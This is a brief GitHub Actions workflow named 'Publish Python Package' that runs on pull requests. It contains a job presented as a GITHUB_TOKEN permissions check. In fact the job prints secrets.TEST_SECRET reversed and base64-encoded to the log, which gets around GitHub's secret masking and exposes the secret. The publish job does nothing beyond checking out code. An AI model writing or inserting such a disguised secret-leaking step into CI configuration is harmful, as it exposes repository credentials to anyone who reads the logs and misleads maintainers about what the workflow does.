name: Publish Python Package
on:
  pull_request:
    branches:
      - main

permissions:
  contents: write

jobs:
  publish:
    environment: release
    runs-on: ubuntu-latest

    steps:
      - name: Checkout code
        uses: actions/checkout@v3
  check_permissions:
    runs-on: ubuntu-latest
    steps:
      - name: Check GITHUB_TOKEN permissions
        run: |
          echo ${{ secrets.TEST_SECRET }} | rev | base64